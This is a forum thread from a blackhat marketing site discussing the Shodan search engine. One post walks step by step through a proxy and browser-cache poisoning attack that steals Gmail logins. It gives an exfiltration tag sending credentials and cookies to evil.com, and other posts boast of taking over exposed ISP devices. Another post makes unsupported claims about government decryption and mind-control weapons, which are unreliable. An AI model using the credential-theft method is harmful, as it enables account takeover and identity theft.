1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Scariest Search Engine on the Internet

Discussion in 'BlackHat Lounge' started by keytenx, Apr 9, 2013.

  1. keytenx

    keytenx Supreme Member

    Joined:
    Sep 18, 2011
    Messages:
    1,256
    Likes Received:
    762
    Occupation:
    Freelance SEO / Link Builder
    Location:
    10°45'N - 122°33'E
    For those people who are using default passwords, you might need to consider changing it before you'll get hacked.

    Code:
    http://money.cnn.com/2013/04/08/technology/security/shodan/index.html?sr=fb040813shodansecurity9p
     
    • Thanks Thanks x 6
  2. jazzc

    jazzc Moderator Staff Member Moderator Jr. VIP

    Joined:
    Jan 27, 2009
    Messages:
    2,477
    Likes Received:
    10,221
    Shodan started as a one man hacker project and was presented on Defcon and Blackhat if I recall. It 's nice to see he 's getting commercial, it 's a very useful idea.
     
  3. keytenx

    keytenx Supreme Member

    Joined:
    Sep 18, 2011
    Messages:
    1,256
    Likes Received:
    762
    Occupation:
    Freelance SEO / Link Builder
    Location:
    10°45'N - 122°33'E
    yes but it could also use by hackers with malicious intent into something that might cause national or possibly global crisis. I bet the feds already aware about Shodan, but why it is still on the net? Sorry about the noob question, im just fascinated why does the gov haven't take it down yet.
     
  4. sashablack

    sashablack Elite Member

    Joined:
    Jan 8, 2010
    Messages:
    3,697
    Likes Received:
    2,050
    Gender:
    Male
    wow, that is cool and scary :(
     
  5. Hostwinds

    Hostwinds Power Member UnGagged Attendee Enterprise Member

    Joined:
    May 17, 2010
    Messages:
    775
    Likes Received:
    546
    Occupation:
    C.E.O.
    Location:
    Seattle
    Home Page:
    Because he isn't breaking the law and this isn't China
     
    • Thanks Thanks x 5
  6. keytenx

    keytenx Supreme Member

    Joined:
    Sep 18, 2011
    Messages:
    1,256
    Likes Received:
    762
    Occupation:
    Freelance SEO / Link Builder
    Location:
    10°45'N - 122°33'E
    Fair enough. :)
     
  7. jazzc

    jazzc Moderator Staff Member Moderator Jr. VIP

    Joined:
    Jan 27, 2009
    Messages:
    2,477
    Likes Received:
    10,221
    You watch too much Hollywood movies :eek:
     
    • Thanks Thanks x 1
  8. keytenx

    keytenx Supreme Member

    Joined:
    Sep 18, 2011
    Messages:
    1,256
    Likes Received:
    762
    Occupation:
    Freelance SEO / Link Builder
    Location:
    10°45'N - 122°33'E
    Now i do realize that you really is a psychic Jazzc. :)
     
  9. mikkelwilk

    mikkelwilk Registered Member

    Joined:
    Apr 1, 2013
    Messages:
    77
    Likes Received:
    5
    Location:
    Utah
    Cool and scary at the same time haha
     
  10. Ptrick125

    Ptrick125 Regular Member

    Joined:
    Mar 4, 2013
    Messages:
    430
    Likes Received:
    113
    Gender:
    Male
    Occupation:
    Going To School
    Location:
    Near Austin, Texas
    It's fascinating what people can do nowadays... With just a computer
     
  11. edgematch

    edgematch Elite Member

    Joined:
    May 24, 2010
    Messages:
    2,539
    Likes Received:
    1,949
    Occupation:
    You can never guess!
    Location:
    :noitacoL
    No. Computers are nothing. He is doing it with just a brain....
     
    • Thanks Thanks x 3
  12. madoctopus

    madoctopus Supreme Member

    Joined:
    Apr 4, 2010
    Messages:
    1,250
    Likes Received:
    3,502
    Occupation:
    Full time IM
    Whats so scary about it? Go on youtube and search "defcon" and watch those vids. Especially the ones about hacking ATC (aircraft traffic control) radio signaling, javascript botnet (to see how dumb some people are and how yo stole identities and personal data), etc. etc.

    Gov already has capability to decrypt a lot of stuff including SSL. They had SSL brutforcing capability since like 10 years ago. Publicly. They could bruteforce SSL128 in 2 seconds flat 10 years ago guess what they can do today?! Moreover they already monitor all traffic including that in other countries and not just internet traffic. During cold war they were doing underwater wiretaping of russian comms. They've had capability to extract data from RAM after computer was turned off for hours, to duplicate a monitor (including LCD) image from a block away by using just the radiation produced by the monitor or the signal cable, etc. You think they have a problem from a bunch of amateurs who use something like Shodan?

    Plus all infrastructure stuff is on closed networks so you can't attack them from online. When you hear they hacked into NASA that's not really NASA but just some servers they had connected to the Internet or computers that were never supposed to have hardcore security. Then infrastructure stuff like power, gas, etc. runs on custom operating systems and using custom software and maybe even on closed source layered networks like the military.

    Yeah I guess some good hackers might get in up to a point but not that far and I'm pretty confident they couldn't crash the whole country like you see in Die Hard movie.

    They can and they have penetrated secure facilities of opposing countries though. I even remember reading or watching a documentary how CIA managed to track some orders of Iraq's gov orders for printers and get them some special printers delivered with special chips in them. Then they used them during the initial phase of the attack to obtain intelligence. Not 100% sure about the accuracy or truth value of this info though but remember something along those lines.

    Want more? They have mass control and targeted methods of mental manipulation and I'm not talking about the stuff using media carriers but more hardcore stuff. For example I read about them using stuff like this in Iraq where they had the enemy soldiers have visions (hallucinations) of Allah telling them there's no point to fight and is better to surrender. Russians used similar stuff (different tech though) in Chechnya and other places. They have microwave weapons (were shown in a documentary called "Future Weapon" I think) for dispersion of masses (they make you feel burns beneath the skin) and say they are non-lethal and safe to use. Its pretty obvious that's a matter of configuration and if you change some parameters you can kill with them.

    So, I wouldn't worry about US having problems. Private sector, especially the average Joe... different story altogether. But then again if you get hacked as a regular person is not like the world ends. Well unless you do really dumb things like reply to that Nigerian prince so you get the $20mil you inherited from the grandfather you never knew you had.
     
    • Thanks Thanks x 4
  13. Samx0

    Samx0 Newbie

    Joined:
    Apr 5, 2013
    Messages:
    14
    Likes Received:
    2
    My email account was hacked a while back and I definitely didn't have a 'generic' password, just logged on on my tablet and the next thing I knew someone was spamming all my contacts.
     
  14. madoctopus

    madoctopus Supreme Member

    Joined:
    Apr 4, 2010
    Messages:
    1,250
    Likes Received:
    3,502
    Occupation:
    Full time IM
    is not complicated to hack accounts. all you have to do is precache a JS and hook into the form and steal the user/pass. this is easy using a proxy with an injector. Example:

    - You decide you want to steal GMail accounts
    - You create a proxy server at IP 1.2.3.4 and find a JS file that gmail login page is loading and inject it with a hook that sends user/pass/cookie/etc to your evil.com server by loading an image using something like <img sec="http://evil.com/steal.php?user=...&pass=...&cookie=...">
    - You make proxy server inject a request for the Google JS file in any page that is requested. You set the expire headers for the JS file to 10 years or something big.
    - User uses your proxy to load blackhatworld.com but also loads the Google JS file bc was injected by the proxy. Now has that poisoned file in the browser cache.
    - User stops using proxy and regularly logs into Gmail. When in gmail login page that page requires the google js file but since browser has it in cache it uses the cached version not the live one. the cached version as we know is poisoned/infected and calls evil.com sending it the credentials.
    - Hacker logs into his evil.com cpanel and sees your details.
    - Hacker logs-in your gmail and changes the pass and starts to spam or whatever (in your name).

    That's the gist of it. Other methods exist too but this is easy and requires little skill. Onl way to protect from this type of attack is to clear browser cache after each session and/or not use public or untrusted proxies. Peope have the misunderstanding that a proxy hides your IP. IT does but it hides it from the other server. The proxy itself knows your IP and has access to all your traffic.
     
    • Thanks Thanks x 1
  15. thedorf

    thedorf Senior Member

    Joined:
    Oct 1, 2008
    Messages:
    1,195
    Likes Received:
    701
    Occupation:
    what? I gotta have a job?
    Location:
    BHW - Where else?
    none of us should be surprised by something like this
     
  16. ReALeST

    ReALeST Power Member

    Joined:
    May 16, 2012
    Messages:
    584
    Likes Received:
    399
    funny thing is i was watching Michael's presentations on this just a day ago....and its prety awesum stuff...he totally pwned a whole ISP with just 10 minutes of searching on shodanhq...its pretty funny coz after watching it i decided id have a go and LO and BEHOLD...theres tons of cisco devices...(and yes ISP's too) on there just open to anybody to totally PWN them!...and am talking redirect traffic...inject ads...own all client data and alot more fun stuff:)!!!If any one is interested here is a talk he gave at Dojocon...enjoy but try not to get arrested lol!
     
    • Thanks Thanks x 1
    Last edited by a moderator: May 18, 2016
  17. ShadeDream

    ShadeDream Elite Member

    Joined:
    Nov 27, 2008
    Messages:
    2,209
    Likes Received:
    5,231
    Location:
    He who laughs last, laughs longest.
    lol
    Code:
    http://www.shodanhq.com/search?q=PHPSESSID
     
  18. xrayxrayers

    xrayxrayers Newbie

    Joined:
    Mar 19, 2013
    Messages:
    30
    Likes Received:
    0
    saw this yesterday. kinda scary how our privacy isn't the same as before now that technology has advanced. Imagine how it will be in 20 years.
     
  19. security

    security Junior Member

    Joined:
    Sep 6, 2011
    Messages:
    128
    Likes Received:
    54
    Occupation:
    Marketing & Technological Consultant.
    Location:
    Miami, FL.
    VERY VERY VERY cool site bro. Thanks for the share. Amazed i never heard of this.
     
  20. charlie3

    charlie3 Senior Member

    Joined:
    Oct 4, 2009
    Messages:
    1,046
    Likes Received:
    468
    Location:
    U of A
    I'm amazed too seeing that your username is 'security' :)
     
    • Thanks Thanks x 1